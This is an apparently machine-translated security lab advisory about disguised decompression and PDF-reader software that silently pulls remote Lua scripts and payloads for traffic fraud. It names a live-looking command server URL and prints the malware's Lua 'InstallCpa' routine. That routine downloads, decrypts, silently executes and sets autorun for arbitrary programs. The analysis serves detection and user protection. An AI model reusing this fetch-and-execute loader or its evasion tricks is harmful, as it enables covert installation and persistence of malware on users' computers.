Recently, baidu security laboratory found a number of commonly used software disguised as "decompression tool", "document reader", etc., but in fact, it secretly carried out remote code execution and traffic swiping for huge profits. Through the technical analysis of these camouflage software, it is found that they all come from the same company in Chongqing. The malicious code author can bypass the detection of security software by registering multiple digital signatures, develop a variety of common gadgets for Internet users using the same framework, and spread them by using a large number of downloaders and "official websites" with simple interfaces. One of them is called "geek compression" decompression software, which has been downloaded as many as 3.08 million times in a certain software management.

When users install these software, they will silently send malicious modules and Lua scripts through remote servers and execute them. During the execution of lua scripts, they will skip the five cities of "Beijing", "Shanghai", "Guangzhou", "Shenzhen" and "Zhuhai" to avoid the capture and analysis of mainstream security manufacturers. Lua script machine has 121 functional APIs, such as downloading any program and silently executing, ending the process, modifying any registry, installing APK to the connected mobile phone, modifying the home page, and local power lifting, etc., which are powerful and shocking. It is worth noting that Lua script can be upgraded and updated at any time. It does not rule out that there are other malicious behaviors such as privacy stealing by using this powerful back door, which has a high security risk.

After the software is installed and started, it will call the "youpdfupdate. Exe" process of the installation directory, pass in the parameter "youp", obtain the dynamic link library from the network, save it to the current path of the program, and name it update.yyp.

"Http://config.younoteba.top/src/youpdfu.html" download and execute the Lua script. After decryption, the script performs a series of initialization operations such as sending machine information to the author server, setting the exit time of the process itself, and then downloads the XML configuration file and completes the operations such as modifying the home page, filtering process, software promotion and installation according to the obtained configuration.

function InstallCpa(v)

     SenBizInfo(v["id"],"cpa","5")  

    if  v['nocheck'] == "true" or  api.IsSoftInstall(v["namecheck"],v["processcheck"],v["iconcheck"],v["regcheck"])  == false then

         local downrs = false                  

         local fileData = ""

        if  v["packname"] == nil or v["packname"] == ""  then

             v["packname"] = string.sub(os.tmpname(),1)              

         end  

         local filepath = api.TempPath() .. v["packname"]

        if  v["downtype"] == "1" then

             for i=1,1,1 do

                 fileData = api.HttpGet(v["url"])         

                 if fileData ~= nil then

                    if  v["isencryptionpack"] == true then

                        local fileDataDecode  = api.DesDecrypt(fileData,tSoftInfo["dkey"])

                        fileData = nil

                        fileData =  fileDataDecode

                    end

                    local file =  io.open(filepath,"wb")

                    if file ~= nil then

                        file:write(fileData)

                        file:close()

                        downrs = true

                    end   

                    break

                 end

             end

         else

             for i=1,1,1 do

                 if api.DownFile(v["url"], filepath) ~= nil then

                    downrs = true

                    break

                 end

             end

        end

        if  downrs == true then

             SenBizInfo(v["id"],"cpa","6")   

             if string.find(v["runtype"],"1") ~= nil then

-- add Arg parameter

                 local cmd = "\"" .. filepath .. "\""

                 if v['arg'] ~= nil and v['arg'] ~= "" then

                    cmd = cmd .. "  " .. v['arg']

                end

                 BzRunWritelog("cpa",v["id"])

                            if  bHadUAC and v['haduac'] == "1" then

                                   api.ShellExec("open",filepath,v['arg'])

                                   api.Delay(50*1000);  

                            else

                                   api.Exec(cmd,3*60*1000)

                                   api.Delay(50*1000);  

                            end

                if  api.IsSoftInstall(v["namecheck"],v["processcheck"],v["iconcheck"],v["regcheck"])  then

                     SenBizInfo(v["id"],"cpa","0")

                 else                   

                     SenBizInfo(v["id"],"cpa","4")

                 end

             end

             if string.find(v["runtype"],"2") ~= nil then

                 if api.SetAutoRun(v["regkey"],cmd) then

                     SenBizInfo(v["id"],"cpa","7")

                 else                   

                    SenBizInfo(v["id"],"cpa","4")

                 end

             end                                 

         else

             SenBizInfo(v["id"],"cpa","2")

        end

Else

         SenBizInfo(v["id"],"cpa","1")

End

End

In recent years, there have been some tools and softwares that use Internet users' computers as money making machines under the banner of "free". These softwares often cheat users' trust on the surface, but malicious behaviors are hard to be detected. Baidu security laboratory suggests that users can form good habits of surfing the Internet, and use security software to conduct security detection in time when finding computer abnormalities. For government and enterprise organizations, we should strengthen the control of software downloading and upgrading, and strengthen the analysis and perception ability of network communication behavior. At the same time, it also advocates that software download stations and distribution channels can strengthen software audit and standardize services.